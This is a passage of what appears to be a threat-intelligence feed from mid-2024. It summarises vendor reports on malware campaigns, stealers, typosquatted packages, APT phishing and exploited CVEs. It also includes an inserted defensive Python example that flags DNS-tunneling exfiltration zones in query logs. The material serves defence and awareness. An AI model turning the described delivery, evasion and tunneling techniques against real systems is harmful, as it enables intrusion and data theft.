Trustwave SpiderLabs discovered a malicious version of the Advanced IP Scanner installer that contained a malicious DLL. Advanced IP Scanner is a tool used by IT administrators to scan and analyze local networks. The incident occurred when a user downloaded the compromised installer from a typo-squatted website that looked like the real site. The attackers targeted this tool by creating a fake website and using Google Ads to make it appear high in search results. The fake installer included a harmful DLL, which is used to inject a CobaltStrike beacon, a tool often used by cybercriminals to control infected systems and steal data. Cybercriminals are using tactics like typo-squatting and fake ads, so staying vigilant is crucial.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/fake-advanced-ip-scanner-installer-delivers-dangerous-cobaltstrike-backdoor/
2024-06-05
Lumma_Crypto_Stealer_Targeting_Python_Developers
LOW
Intel Source:
Sonatype
Intel Name:
Lumma_Crypto_Stealer_Targeting_Python_Developers
Date of Scan:
2024-06-05
Impact:
LOW
Summary:
Researchers from Sonatype have discovered a PyPI package called 'crytic-compilers,' which is named very similarly to a well-known legitimate Python library used by cryptocurrency developers. This legitimate library helps in compiling smart contracts, which are digital agreements stored on the blockchain network.
Source: https://www.sonatype.com/blog/crytic-compilers-typosquats-known-crypto-library-drops-windows-trojan
2024-06-04
PikaBot_Guide_of_Deep_Secrets_and_Operations
MEDIUM
Intel Source:
Sekoia
Intel Name:
PikaBot_Guide_of_Deep_Secrets_and_Operations
Date of Scan:
2024-06-04
Impact:
MEDIUM
Summary:
Sekoia has conducted an in-depth analysis of the PikaBot Loader, a sophisticated malware loader utilized by cybercriminals since 2023. It is distributed through various methods, such as phishing emails and fake ads, with the goal of infecting numerous systems, particularly those within organizations. Successful compromises with PikaBot often lead to the deployment of the Black Basta ransomware. This malware is intelligently crafted to evade detection by security systems, using tricks to hide its true nature and utilizing advanced techniques for evasion.
Source: https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/
2024-06-04
Excel_File_Unleashes_Cobalt_Strike_Against_Ukraine
LOW
Intel Source:
Fortinet
Intel Name:
Excel_File_Unleashes_Cobalt_Strike_Against_Ukraine
Date of Scan:
2024-06-04
Impact:
LOW
Summary:
Researchers at FortiGuard have discovered a sophisticated cyberattack involving an Excel file that has a VBA macro embedded in it that is intended to launch a DLL file. The attacker uses a multi-stage malware strategy to deliver the notorious "Cobalt Strike" payload and communicate with a command and control (C2) server. This attack uses various techniques for evasion to guarantee that the payload is successfully delivered.
Source: https://www.fortinet.com/blog/threat-research/menace-unleashed-excel-file-deploys-cobalt-strike-at-ukraine
2024-06-04
Cybercriminals_Attack_Banking_Customers_In_EU_With_V3B_Phishing_Kit
MEDIUM
Intel Source:
Resecurity
Intel Name:
Cybercriminals_Attack_Banking_Customers_In_EU_With_V3B_Phishing_Kit
Date of Scan:
2024-06-04
Impact:
MEDIUM
Summary:
Resecurity has uncovered a group of cybercriminals providing fraudsters with advanced phishing kits to target banking customers in the European Union. The kit is offered as Phishing-as-a-Service (PaaS) and is designed to capture sensitive information, including credentials and OTP codes. The operation has been led by "Vssrtje" since March 2023 and promotes the "V3B" kit on Telegram and Dark Web communities. The panel allows fraudsters to engage with victims and obtain OTP codes for enabling illegal transactions. The V3B kit is regularly updated to evade detection and targets multiple countries in Europe.
Source: https://www.resecurity.com/blog/article/cybercriminals-attack-banking-customers-in-eu-with-v3b-phishing-kit
2024-06-04
UNC1151_Strikes_Against_Ukraine_Ministry_of_Defence
LOW
Intel Source:
Cyble
Intel Name:
UNC1151_Strikes_Against_Ukraine_Ministry_of_Defence
Date of Scan:
2024-06-04
Impact:
LOW
Summary:
CRIL discovered a campaign by the APT group UNC1151, which originates from Belarus and is known for targeting Eastern European countries. The group is focusing on Ukraine's Ministry of Defence in its latest campaign. The attackers use malicious Excel files with VBA macros that drop LNK and DLL files to infect systems. Earlier campaigns used an encrypted JPG file for the payload, but the current one uses encrypted SVG files. They trick users with spam emails into enabling macros, which then execute the malicious code.
Source: https://cyble.com/blog/unc1151-strikes-again-unveiling-their-tactics-against-ukraines-ministry-of-defence
2024-06-04
An_Examination_of_DarkGate_Updates
LOW
Intel Source:
Trellix
Intel Name:
An_Examination_of_DarkGate_Updates
Date of Scan:
2024-06-04
Impact:
LOW
Summary:
Trellix researchers have examined the various updates involving the DarkGate author, RastaFarEye, as well as the most recent DarkGate campaigns and versions, diving into the changes and features they contain. This investigation led to the discovery of some servers containing both DarkGate and PikaBot samples, a behavior reported by other security colleagues, most likely due to the operator purchasing both services rather than relying on a single malware family for operations.
Source: https://www.trellix.com/blogs/research/darkgate-again-but-improved/
2024-06-04
DarkCrystal_RAT_Targeting_Ukrainian_Officials_via_Signal
LOW
Intel Source:
CERT-UA
Intel Name:
DarkCrystal_RAT_Targeting_Ukrainian_Officials_via_Signal
Date of Scan:
2024-06-04
Impact:
LOW
Summary:
CERT-UA researchers have warned of targeted cyber attacks on Ukrainian civil servants, military personnel, and defense industry representatives. Attackers are distributing the DarkCrystal RAT via the Signal messenger app, disguising messages as coming from trusted contacts. The malicious files, disguised as harmless documents, lead to the installation of the RAT, granting unauthorized access to victims' computers.
Source: https://cert.gov.ua/article/6279561
2024-06-03
CarnavalHeist_Banking_Trojan_Targeting_Brazilian_Users
LOW
Intel Source:
Talos
Intel Name:
CarnavalHeist_Banking_Trojan_Targeting_Brazilian_Users
Date of Scan:
2024-06-03
Impact:
LOW
Summary:
Researchers from Cisco Talos have discovered a new banking trojan called CarnavalHeist that targets Brazilian users with overlay attacks. Talos is confident that this malware originates from Brazil, as the infection process and the malware itself extensively use Portuguese and Brazilian slang for bank names, with no other language variants found. The command and control infrastructure is exclusively based in the BrazilSouth zone on Microsoft Azure and specifically targets major Brazilian banks.
Source: https://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/
2024-06-03
Vidar_Stealer_An_Info_Stealing_Malware
MEDIUM
Intel Source:
Cyfirma
Intel Name:
Vidar_Stealer_An_Info_Stealing_Malware
Date of Scan:
2024-06-03
Impact:
MEDIUM
Summary:
CYFIRMA has spotted a malware-as-a-service (MaaS) called Vidar Stealer, written in C++, which has capabilities and tactics to evade detection. The malware, active since 2018, has evolved to steal sensitive information such as personal data, browser data, cryptocurrency wallets, and financial information from compromised systems. It uses social media platforms like Telegram and Steam for its command-and-control (C2) infrastructure, enabling it to avoid detection and change IP addresses.
Source: https://www.cyfirma.com/research/vidar-stealer-an-in-depth-analysis-of-an-information-stealing-malware/
2024-06-03
Snowflake_Detecting_and_Preventing_Unauthorized_User_Access
MEDIUM
Intel Source:
Snowflake
Intel Name:
Snowflake_Detecting_and_Preventing_Unauthorized_User_Access
Date of Scan:
2024-06-03
Impact:
MEDIUM
Summary:
Snowflake has observed a rise in cyber threats targeting some of their customers' accounts. They believe these attacks aim to steal customer data and are part of wider identity-based attacks in the industry. Their research shows that the attackers are using customer login credentials exposed in unrelated cyber incidents. So far, they do not believe this is due to any weakness or malicious activity within Snowflake itself.
Source: https://community.snowflake.com/s/article/Communication-ID-0108977-Additional-Information
2024-06-03
Botnet_installing_NiceRAT_malware
LOW
Intel Source:
ASEC
Intel Name:
Botnet_installing_NiceRAT_malware
Date of Scan:
2024-06-03
Impact:
LOW
Summary:
ASEC has identified that NiceRAT malware was recently installed through a botnet active since 2019. A botnet is a group of devices infected with malicious code and controlled by an attacker. Initially, botnets were used for DDoS attacks, but now they often use malware like NanoCore and Emotet for data theft and installing additional malware. Attackers distribute this malware disguised as genuine Windows or Office tools or game servers through file-sharing sites and blogs. Recently, NanoCore malware, which creates botnets, has been used to install NiceRAT and other malware.
Source: https://asec.ahnlab.com/ko/66040/
2024-05-31
A_New_Execution_Technique_in_ClearFake_Campaign
LOW
Intel Source:
ReliaQuest
Intel Name:
A_New_Execution_Technique_in_ClearFake_Campaign
Date of Scan:
2024-05-31
Impact:
LOW
Summary:
Researchers at ReliaQuest have uncovered a campaign utilizing novel methods of execution derived from the JavaScript framework "ClearFake": the adversary tricks users into manually copying and executing malicious code in PowerShell. This is not the same as the normal drive-by downloads that are commonly linked to distribution efforts for "fake browser updates," such as ClearFake, when the user is tricked into downloading and executing a malicious payload.
Source: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
2024-05-31
OpenAI_Models_Used_in_Nation_State_Influence_Campaigns
LOW
Intel Source:
OpenAI
Intel Name:
OpenAI_Models_Used_in_Nation_State_Influence_Campaigns
Date of Scan:
2024-05-31
Impact:
LOW
Summary:
Researchers from OpenAI have discovered that malicious actors exploit OpenAI's generative AI models to craft and spread propaganda on social media, translating content into multiple languages. The investigation led to the disruption of disinformation campaigns originating from Russia, China, Israel, and Iran. Some of the individuals involved were already known to researchers and authorities; a few had previously been sanctioned by the US Treasury and banned by Meta.
Source: https://openai.com/index/disrupting-deceptive-uses-of-AI-by-covert-influence-operations/
2024-05-31
The_delivery_of_BitRAT_and_Lumma_Stealer
MEDIUM
Intel Source:
Esentire
Intel Name:
The_delivery_of_BitRAT_and_Lumma_Stealer
Date of Scan:
2024-05-31
Impact:
MEDIUM
Summary:
Esentire detected an incident and detailed its analysis of Lumma Stealer's decryption routine and configuration; the malware targets sensitive data and cryptocurrency wallets. The write-up describes the malware's operation, including its C2 communication, payload deployment, and an infection chain in which fake browser updates deliver BitRAT and Lumma Stealer.
Source: https://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer
2024-05-31
Operation_Endgame_of_Smoke_Malware
MEDIUM
Intel Source:
Zscaler
Intel Name:
Operation_Endgame_of_Smoke_Malware
Date of Scan:
2024-05-31
Impact:
MEDIUM
Summary:
Zscaler ThreatLabz conducted the first major joint operation, known as Endgame, with international law enforcement targeting Smoke malware, also known as Dofoil. This malware has been operational since 2011 and is used to deliver second-stage malware, including various trojans, ransomware, and information stealers. Zscaler ThreatLabz has also observed multiple malware families, such as Raspberry Robin, Stealc, and Stop ransomware, being delivered through Smoke. The operation aimed to dismantle Smoke’s infrastructure and remotely clean up infections. Operation Endgame represents the first significant international disruption of Smoke in over a decade and is expected to impact the overall threat ecosystem.
Source: https://www.zscaler.com/blogs/security-research/operation-endgame-smoke
2024-05-31
The_Rebirth_botnet_analysis
MEDIUM
Intel Source:
Sysdig
Intel Name:
The_Rebirth_botnet_analysis
Date of Scan:
2024-05-31
Impact:
MEDIUM
Summary:
Sysdig researchers provided a comprehensive analysis of the Rebirth botnet and related Linux malware, focusing on detection and mitigation techniques. It highlights the use of deceptive task names and the "/tmp" directory for malware execution. The Rebirth botnet, active since 2019, targets the gaming community for financial gain and DDoS attacks, with key figures like "CazzG" and "Docx69" involved. The botnet spreads via malicious ELF files and uses techniques like `prctl` syscall for process obfuscation. Effective detection requires monitoring suspicious activities and capturing initial payloads to understand malware behavior.
Source: https://sysdig.com/blog/ddos-as-a-service-the-rebirth-botnet/
2024-05-31
Russian_Hackers_Targeting_Europe_with_HeadLace_Malware_and_Credential_Harvesting
LOW
Intel Source:
Recorded Future
Intel Name:
Russian_Hackers_Targeting_Europe_with_HeadLace_Malware_and_Credential_Harvesting
Date of Scan:
2024-05-31
Impact:
LOW
Summary:
Researchers at Recorded Future have observed the evolution of BlueDelta's operational infrastructure, which was used to deliver its information-stealing malware Headlace in three discrete phases between April and December 2023. This activity is similar to earlier activity that has been linked to APT28 or Fancy Bear by the Insikt Group, the Computer Emergency Response Team of Ukraine (CERT-UA), and other groups. These groups have previously linked the activity to the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).
Source: https://go.recordedfuture.com/hubfs/reports/CTA-RU-2024-0530.pdf
2024-05-31
VexTrio_Viper_new_DNS_TDS_domain
LOW
Intel Source:
Infoblox
Intel Name:
VexTrio_Viper_new_DNS_TDS_domain
Date of Scan:
2024-05-31
Impact:
LOW
Summary:
Infoblox's research team discusses the discovery of a new DNS-based traffic distribution system (TDS) domain, airlogs[.]net, linked to the VexTrio Viper threat actor. The post highlights the role of Infoblox's Zero Day DNS™ in identifying such threats, the shift to server-side checks, and the importance of DNS-based security solutions and collaboration in cybersecurity.
Source: https://blogs.infoblox.com/threat-intelligence/vextrio-viper-adds-a-new-dns-tds-domain/
2024-05-31
Moonstone_Sleet_threat_group_deploys_custom_ransomware
MEDIUM
Intel Source:
Microsoft
Intel Name:
Moonstone_Sleet_threat_group_deploys_custom_ransomware
Date of Scan:
2024-05-31
Impact:
MEDIUM
Summary:
Moonstone Sleet, a North Korean threat actor group, targets sectors like software, IT, education, and defense with espionage and ransomware attacks. They use custom ransomware FakePenny, trojanized software, malicious npm packages, and fake personas, demanding high ransoms.
Source: https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/
2024-05-31
The_Pumpkin_Eclipse
LOW
Intel Source:
Lumen
Intel Name:
The_Pumpkin_Eclipse
Date of Scan:
2024-05-31
Impact:
LOW
Summary:
Lumen researchers have discovered a devastating event in which over 600,000 small office/home office (SOHO) routers from a single internet service provider (ISP) were taken offline. The incident occurred over a 72-hour period from October 25 to 27, rendered the infected devices permanently unusable, and necessitated hardware replacement. During this period, public scan data revealed the rapid and precipitous removal of 49% of all modems from the affected ISP's autonomous system number (ASN).
Source: https://blog.lumen.com/the-pumpkin-eclipse/
2024-05-31
XMRig_CoinMiner_Installed_via_Game_Emulator
LOW
Intel Source:
ASEC
Intel Name:
XMRig_CoinMiner_Installed_via_Game_Emulator
Date of Scan:
2024-05-31
Impact:
LOW
Summary:
The AhnLab Security Intelligence Center (ASEC) recently discovered that the XMRig CoinMiner is being spread through a game emulator. The malware is distributed via a website offering an emulator for a popular gaming console. When users download the emulator, they receive a compressed file containing a readme.txt with a password and a troubleshooting guide. Extracting the file reveals an installation guide and the emulator program. However, instead of installing the emulator, running the file creates and executes the CoinMiner via PowerShell commands. Users should download software only from official sites.
Source: https://asec.ahnlab.com/en/66114/
2024-05-31
K1w1_InfoStealer_Using_Gofile_io_For_Exfiltration
LOW
Intel Source:
ISC.SANS
Intel Name:
K1w1_InfoStealer_Using_Gofile_io_For_Exfiltration
Date of Scan:
2024-05-31
Impact:
LOW
Summary:
Researchers at ISC.SANS have examined an interesting script written in Python that is typically difficult for antivirus solutions to detect. Since the string "k1w1" appears in numerous variable and function names, they chose to refer to it as the "k1w1" infostealer. The script has the typical infostealer behavior of finding relevant data on the victim's computer, but it also employs some novel tactics.
Source: https://isc.sans.edu/diary/rss/30972
2024-05-31
PyPI_crypto_stealer_attacks_Windows_users
LOW
Intel Source:
Sonatype
Intel Name:
PyPI_crypto_stealer_attacks_Windows_users
Date of Scan:
2024-05-31
Impact:
LOW
Summary:
Sonatype's team reveals the "pytoileur" PyPI package targeting Windows users, part of the "Cool package" campaign. It installs trojanized binaries for surveillance and crypto-theft, using obfuscation techniques. Sonatype's detection flagged it after 264 downloads.
Source: https://www.sonatype.com/blog/pypi-crypto-stealer-targets-windows-users-revives-malware-campaign
2024-05-31
Dora_RAT_Against_Korean_Companies
LOW
Intel Source:
ASEC
Intel Name:
Dora_RAT_Against_Korean_Companies
Date of Scan:
2024-05-31
Impact:
LOW
Summary:
The AhnLab Security Intelligence Center (ASEC) recently uncovered multiple attack cases by the Andariel APT group targeting educational, manufacturing, and construction sectors in Korea. These attacks use various malware such as keyloggers and infostealers to control infected systems and steal data from compromised systems. Attackers have developed new malware, like Dora RAT, to perform basic malicious functions. The group uses vectors like spear phishing, watering hole attacks, and exploiting software flaws to gain access.
Source: https://asec.ahnlab.com/en/66088/
2024-05-31
Check_Point_Remote_Access_VPN
LOW
Intel Source:
Mnemonic
Intel Name:
Check_Point_Remote_Access_VPN
Date of Scan:
2024-05-31
Impact:
LOW
Summary:
A critical vulnerability (CVE-2024-24919) in Check Point Security Gateways with Remote Access VPN enabled allows unauthorized data extraction, including password hashes. With a CVSS score of 7.5, exploitation has been active since April 2024. Mitigation includes updates, user removal, and log searches.
Source: https://www.mnemonic.io/resources/blog/advisory-check-point-remote-access-vpn-vulnerability-cve-2024-24919/
2024-05-31
DLL_Side_Loading_through_IObit_against_Colombia
LOW
Intel Source:
Lab52
Intel Name:
DLL_Side_Loading_through_IObit_against_Colombia
Date of Scan:
2024-05-31
Impact:
LOW
Summary:
Lab52 researchers have uncovered a new phishing campaign in Colombia in May 2024 in which attackers impersonated the Colombian Attorney General's Office. The campaign aims to infect victims' systems with the AsyncRAT malware using a sophisticated method involving legitimate software and a series of malicious files. In this campaign the attackers use a legitimate ZIP file containing the IObit anti-malware program, and the malware chain also uses an Apple audio file and a VCF file to inject AsyncRAT.
Source: https://lab52.io/blog/dll-side-loading-through-iobit-against-colombia/
2024-05-30
FlyingYeti_campaign_targeting_Ukraine
LOW
Intel Source:
Cloudflare
Intel Name:
FlyingYeti_campaign_targeting_Ukraine
Date of Scan:
2024-05-30
Impact:
LOW
Summary:
Cloudforce researchers have uncovered the latest phishing campaign of FlyingYeti, a Russia-aligned threat group targeting Ukraine. The group is taking advantage of Ukraine's situation with housing and utility debts after Russia's attack, manipulating people's fears of losing access to crucial services. The threat actors distribute COOKBOX, a PowerShell malware used to gain control over victims' systems. Their phishing campaign masquerades as a legitimate housing site, deceiving individuals into downloading malware disguised as documents related to debt.
Source: https://blog.cloudflare.com/disrupting-flyingyeti-campaign-targeting-ukraine
2024-05-30
Supply_Chaining_Into_SSH_Using_XZ_Backdoor
MEDIUM
Intel Source:
Cybereason
Intel Name:
Supply_Chaining_Into_SSH_Using_XZ_Backdoor
Date of Scan:
2024-05-30
Impact:
MEDIUM
Summary:
Cybereason researchers have observed a sophisticated backdoor in the open-source compression library XZ Utils versions 5.6.0 and 5.6.1 for the Linux operating system. A common compression format in Linux, XZ may be found in most commercial and open-source distributions. Large files are compressed into smaller ones for easy sharing and transferring.
Source: https://www.cybereason.com/blog/threat-alert-the-xz-backdoor
2024-05-30
Analyzing_Water_Sigbins_Most_Recent_Obfuscation_Techniques
LOW
Intel Source:
Trend Micro
Intel Name:
Analyzing_Water_Sigbins_Most_Recent_Obfuscation_Techniques
Date of Scan:
2024-05-30
Impact:
LOW
Summary:
TrendMicro researchers have observed that Water Sigbin (aka the 8220 Gang) is a China-based threat actor active since at least 2017. It mostly deploys cryptocurrency-mining malware in cloud-based systems and on Linux servers. The group is notable for incorporating vulnerability exploitation into its diverse set of TTPs. Using a PowerShell script, Water Sigbin deployed a cryptocurrency miner by taking advantage of vulnerabilities CVE-2017-3506 and CVE-2023-21839. The group used obfuscation techniques such as hexadecimal encoding of URLs and HTTP over port 443, which allowed for covert payload distribution.
Source: https://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html
2024-05-30
Malware_Distribution_Disguised_as_Cracked_Versions_of_Microsoft_Office
LOW
Intel Source:
ASEC
Intel Name:
Malware_Distribution_Disguised_as_Cracked_Versions_of_Microsoft_Office
Date of Scan:
2024-05-30
Impact:
LOW
Summary:
Researchers from ASEC have previously shared information about an attack instance in which a threat actor distributed CoinMiner and RAT to Korean users. The attacker created and distributed several malware strains up until recently, including downloaders, CoinMiner, RAT, Proxy, and AntiAV. Malware strains distributed under the guise of cracked versions of legitimate programs, including Hangul Word Processor or Windows or Microsoft Office activation tools, frequently infect many systems in South Korea.
Source: https://asec.ahnlab.com/en/66017/
2024-05-30
The_distribution_of_XWorm_v5_6_malware
MEDIUM
Intel Source:
ASEC
Intel Name:
The_distribution_of_XWorm_v5_6_malware
Date of Scan:
2024-05-30
Impact:
MEDIUM
Summary:
Researchers discovered a campaign distributing the XWorm v5.6 malware disguised as adult games through Korean file-sharing platforms called webhards. The malware employs tactics like downloading encrypted components from command-and-control servers, injecting itself into legitimate processes, and conducting activities like keylogging, webcam data exfiltration, and additional malware downloads.
Source: https://asec.ahnlab.com/en/66099/
2024-05-30
Diving_Deep_into_Common_Infostealers
LOW
+
Intel Source:
ReliaQuest
Intel Name:
Diving_Deep_into_Common_Infostealers
Date of Scan:
2024-05-30
Impact:
LOW
Summary:
ReliaQuest researchers discovered a considerable increase in information-stealing (infostealer) malware activity in the cyber threat landscape, with a 30.5% increase in marketplace listings for "stealer logs" between Q3 and Q4 2023. In addition to describing the targeted industries and regions as well as the tactics, techniques, and procedures (TTPs) used, the report provides a basic overview of typical infostealer types and suggests best practices for mitigation.
Source: https://www.reliaquest.com/blog/common-infostealers/
2024-05-30
The_stealthy_trilogy_of_PurpleInk_InkBox_and_InkLoader
MEDIUM
+
Intel Source:
Talos
Intel Name:
The_stealthy_trilogy_of_PurpleInk_InkBox_and_InkLoader
Date of Scan:
2024-05-30
Impact:
MEDIUM
Summary:
Talos attributed a new data theft campaign to an advanced persistent threat actor it tracks as LilacSquid. The campaign targets diverse victims across various sectors in the United States, Europe, and Asia. After compromising vulnerable internet-facing application servers, the actor deploys MeshAgent, an open-source remote management tool, and a customized version of QuasarRAT called PurpleInk as its primary implants. LilacSquid leverages vulnerabilities and compromised RDP credentials to deploy MeshAgent, SSF, PurpleInk, and two malware loaders called InkBox and InkLoader for long-term access and data exfiltration.
Source: https://blog.talosintelligence.com/lilacsquid/
2024-05-30
RedTail_Cryptominer_Malware
LOW
+
Intel Source:
Akamai
Intel Name:
RedTail_Cryptominer_Malware
Date of Scan:
2024-05-30
Impact:
LOW
Summary:
Akamai researchers report that RedTail, a cryptomining malware first observed in early 2024, now exploits CVE-2024-3400 in Palo Alto Networks PAN-OS to execute commands with root privileges. The operators have refined their tactics with private cryptomining pools and new anti-research techniques, and the malware spreads through multiple web exploits targeting IoT devices, web applications, and security appliances. The PAN-OS exploitation activity was observed between April and May 2024, and the malware uses a range of techniques to evade detection.
Source: https://www.akamai.com/blog/security-research/2024-redtail-cryptominer-pan-os-cve-exploit
2024-05-30
Discovering_CryptoChameleon_fast_flux_IOFAs
LOW
+
Intel Source:
Silentpush
Intel Name:
Discovering_CryptoChameleon_fast_flux_IOFAs
Date of Scan:
2024-05-30
Impact:
LOW
Summary:
Silent Push threat analysts published an analysis of the CryptoChameleon phishing kit, which is used to harvest sensitive information from employees and customers of various platforms. Their research uncovered a large number of fast-flux Indicators of Future Attack (IOFAs) targeting cryptocurrency exchanges, technology companies, and other platforms; the infrastructure relies on DNSPod nameservers and fast-flux rotation to evade takedown. The report provides background on CryptoChameleon, its tactics and techniques, and the associated infrastructure discovered by Silent Push.
Source: https://www.silentpush.com/blog/cryptochameleon/
2024-05-30
The_macOS_Implant_LightSpy
LOW
+
Intel Source:
Threat Fabric
Intel Name:
The_macOS_Implant_LightSpy
Date of Scan:
2024-05-30
Impact:
LOW
Summary:
ThreatFabric researchers found that the macOS variant of LightSpy resembles a campaign observed a few years ago. Even so, examining this advanced spyware toolset was worthwhile because it revealed the threat actor's objectives and the specific information they were after. Regardless of the platform targeted, the group concentrated on intercepting victim communications, including voice recordings and messenger conversations. A dedicated network discovery plugin for macOS was built to locate devices close to the victim.
Source: https://www.threatfabric.com/blogs/lightspy-implant-for-macos
2024-05-30
The_exposure_of_AsukaStealer_malware
LOW
+
Intel Source:
Seqrite
Intel Name:
The_exposure_of_AsukaStealer_malware
Date of Scan:
2024-05-30
Impact:
LOW
Summary:
AsukaStealer is a malware that infiltrates popular browsers to extract credentials, cookies, and extension data; it also targets cryptocurrency wallets, messaging platforms, and gaming software. It offers customizable configurations and a user-friendly operator interface, uses techniques such as API hashing, and communicates with a C2 server. With file exfiltration, screenshot capture, and coin-mining capabilities, AsukaStealer poses a significant threat to individuals and organizations.
Source: https://www.seqrite.com/blog/unmasking-asukastealer-the-80-malware-threatening-your-digital-security/
2024-05-29
The_abuse_of_Kiteshield_Packer
LOW
+
Intel Source:
Qianxin
Intel Name:
The_abuse_of_Kiteshield_Packer
Date of Scan:
2024-05-29
Impact:
LOW
Summary:
Qianxin researchers shared an analysis uncovering the use of the Kiteshield packer by various cybercriminal groups to evade detection on Linux. They reverse-engineered samples from the APT group Winnti, the cybercrime group DarkMosquito, and a script-kiddie operation, documenting Kiteshield's anti-debugging techniques, string obfuscation, and encryption. Despite the initial excitement over potentially novel threats, the findings show cybercriminals adopting Kiteshield to bypass antivirus detection, and the report emphasizes the need for better detection of this packer as Linux malware continues to evolve.
Source: https://blog.xlab.qianxin.com/kiteshield_packer_is_being_abused_by_linux_cyber_threat_actors/
2024-05-29
North_Korean_Hackers_Linked_to_New_FakePenny_Ransomware
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
North_Korean_Hackers_Linked_to_New_FakePenny_Ransomware
Date of Scan:
2024-05-29
Impact:
MEDIUM
Summary:
Microsoft researchers have discovered a new North Korean threat actor, now known as Moonstone Sleet (formerly Storm-1789). This actor targets companies for financial and cyberespionage purposes by utilizing a variety of well-established tactics also employed by other North Korean threat actors as well as original attack methodologies. In order to interact with possible targets, Moonstone Sleet is known to build fake companies and job opportunities, use trojanized copies of legitimate tools, create malicious games, and distribute brand-new customized ransomware.
Source: https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/
2024-05-29
Allasenha_Allakore_variant_targeting_Lating_America
LOW
+
Intel Source:
Harfanglab
Intel Name:
Allasenha_Allakore_variant_targeting_Lating_America
Date of Scan:
2024-05-29
Impact:
LOW
Summary:
Researchers from HarfangLab have discovered a malware called "AllaSenha" that targets Brazilian bank accounts using Python scripts and a Delphi-developed loader. This malware is a variant of the AllaKore RAT and uses the Azure cloud for its command and control. The infection begins with a fake PDF file spread through phishing emails. When the user opens it, a chain of downloads and executions follows, including a BAT file, the "BPyCode launcher", which runs a PowerShell command to download and execute a Python script. AllaSenha targets major Brazilian banks, stealing passwords and authentication tokens.
Source: https://harfanglab.io/en/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/
2024-05-29
Hellhounds_Operation_Lahat_Part_2
LOW
+
Intel Source:
PTsecurity
Intel Name:
Hellhounds_Operation_Lahat_Part_2
Date of Scan:
2024-05-29
Impact:
LOW
Summary:
Positive Technologies researchers report that the Hellhounds group has continued to attack Russian organizations into 2024, using a range of techniques to compromise infrastructure. Development of the group's malware toolkit dates back to 2019, with the earliest Windows and Linux samples from 2019 and 2021 respectively, and the group has maintained a presence inside critical organizations for years. Although based on open-source projects, the malware is modified to bypass defenses and makes use of encryption and obfuscation. Footholds are gained via system services, and the main C2 method is DNS tunneling. There are at least 48 confirmed victims, concentrated in the public sector and among IT contractors, which were likely compromised via supply chain attacks and trusted relationships.
Source: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/hellhounds-operation-lahat-part-2/
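DNS tunneling is named above as the group's main C2 channel. As an added example that is not from the Positive Technologies report, the following Python profiles a DNS query log per zone and flags zones whose query pattern looks like a data channel: long, high-entropy, never-repeating subdomains sent in record types that can carry arbitrary data. The log lines, the sync-host.net zone and the thresholds are constructed assumptions, and the zone split (last two labels) is a simplification that a public-suffix list would replace in production.

```python
from __future__ import annotations
import math
from collections import defaultdict

# Constructed query log (not from the report): "<epoch> <client> <qtype> <qname>".
# The sync-host.net zone carries hex-looking, never-repeating labels in TXT queries.
SAMPLE_LOG = """\
1716969601 10.0.0.12 A www.example.org
1716969602 10.0.0.12 A cdn.example.org
1716969603 10.0.0.13 A mail.example.org
1716969604 10.0.0.12 TXT 4a1f9c0e7b3d52a6.8e2c1d0f9b7a3e45.6c0d2f1e.up.sync-host.net
1716969605 10.0.0.12 TXT 0d7e3b9a2c5f1e48.3a9f7e1c5b0d2f86.e1b4a9c3.up.sync-host.net
1716969606 10.0.0.12 TXT c2e8f0a4d6b1395e.7f3a0c9e5d2b1a84.a0c7e3f1.up.sync-host.net
1716969607 10.0.0.12 TXT 9f1b3d5a7c0e2468.1e5c3a9f7b0d2684.b3d1f0a7.up.sync-host.net
1716969608 10.0.0.13 A www.example.org
"""

# Record types whose answers or names routinely carry opaque data.
DATA_TYPES = {"TXT", "NULL", "CNAME", "MX"}


def shannon_entropy(s: str) -> float:
    """Bits per character; random hex approaches 4.0, English words sit near 3."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((s.count(c) / n) * math.log2(s.count(c) / n) for c in set(s))


def split_name(qname: str) -> tuple[str, str]:
    """Split a query name into (subdomain, zone), treating the last two labels
    as the zone. Assumption for the example; use a public-suffix list for real data."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def profile_zones(log: str) -> dict[str, dict]:
    """Per-zone statistics over the whole log."""
    acc = defaultdict(lambda: {"n": 0, "subs": set(), "len": 0, "ent": 0.0, "data": 0})
    for line in log.splitlines():
        if not line.strip():
            continue
        _, _, qtype, qname = line.split()
        sub, zone = split_name(qname)
        z = acc[zone]
        z["n"] += 1
        z["subs"].add(sub)
        z["len"] += len(sub)
        z["ent"] += shannon_entropy(sub.replace(".", ""))
        z["data"] += qtype.upper() in DATA_TYPES
    return {
        zone: {
            "queries": z["n"],
            "avg_sub_len": z["len"] / z["n"],
            "unique_ratio": len(z["subs"]) / z["n"],
            "avg_entropy": z["ent"] / z["n"],
            "data_type_share": z["data"] / z["n"],
        }
        for zone, z in acc.items()
    }


def tunnel_candidates(log: str, min_queries: int = 3) -> list[str]:
    """Zones that look like a tunnel. Thresholds are assumptions for the example:
    long subdomains, almost no repeats, high entropy, mostly data-carrying types."""
    out = []
    for zone, p in profile_zones(log).items():
        if p["queries"] < min_queries:
            continue
        if (p["avg_sub_len"] >= 30 and p["unique_ratio"] >= 0.8
                and p["avg_entropy"] >= 3.0 and p["data_type_share"] >= 0.5):
            out.append(zone)
    return sorted(out)


if __name__ == "__main__":
    for zone, p in profile_zones(SAMPLE_LOG).items():
        print(zone, p)
    print("candidates:", tunnel_candidates(SAMPLE_LOG))
```

Each signal on its own is noisy (CDNs produce long unique labels, anti-spam services make many TXT queries), so the verdict requires all four together and a minimum query count per zone; tune the thresholds against a baseline of your own resolver logs before alerting on them.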
2024-05-29
Uncovers_Piano_Themed_Email_Scam
LOW
+
Intel Source:
